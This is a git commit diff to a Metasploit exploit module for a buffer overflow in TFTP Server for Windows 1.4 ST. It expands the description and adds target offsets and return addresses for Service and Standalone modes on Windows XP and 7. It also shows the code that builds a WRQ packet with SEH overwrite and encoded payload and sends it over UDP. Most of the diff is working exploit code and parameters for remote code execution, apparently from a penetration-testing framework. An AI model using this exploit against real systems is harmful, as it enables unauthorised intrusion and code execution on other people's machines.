Implemented Changes suggested by wchen-r7 (sinn3r)

2012-04-20 00:02:41 +01:00 · 2012-04-20 00:02:41 +01:00 · 47ecd36805
parent feb625cab0
commit 47ecd36805
1 changed files with 18 additions and 7 deletions
--- a/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb
+++ b/modules/exploits/windows/tftp/tftpserver_wrq_buf.rb
@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Name'			=> 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',

 						'Description'	=> %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
-											muts..at..offensive-security.com SEH Exploit 
+											muts..at..offensive-security.com 
+											The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request. 
+											The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
+											and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
+											which allows the corrupted data to be used in a strcmp() function, causing an access violation.	
+
+											Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
+											launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
+											A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
 											ported to metasploit by Datacut},

 						'Author'	=>
@ -40,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote

 										[ 'OSVDB', '43785' ],

-										['BID', '18345' ],
+										[ 'BID', '18345' ],

 										[ 'URL', 'http://www.exploit-db.com/exploits/5314/' ],

@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote

 										# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista

-										[ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
-										[ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
-										[ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
+										[ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
+										[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
+										[ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
+										[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
+										[ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
+										[ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
 								],

 						'Privileged'	=> false,

 						'DisclosureDate'=> 'Mar 26 2008',

-						'DefaultTarget'	=> 2))
+						'DefaultTarget'	=> 5))


 					register_options(
@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
 				mode = "netascii"

-				sploit = "\x00\x02" + evil + "\0" + mode +"\0"
+				sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02")

 				udp_sock.put(sploit)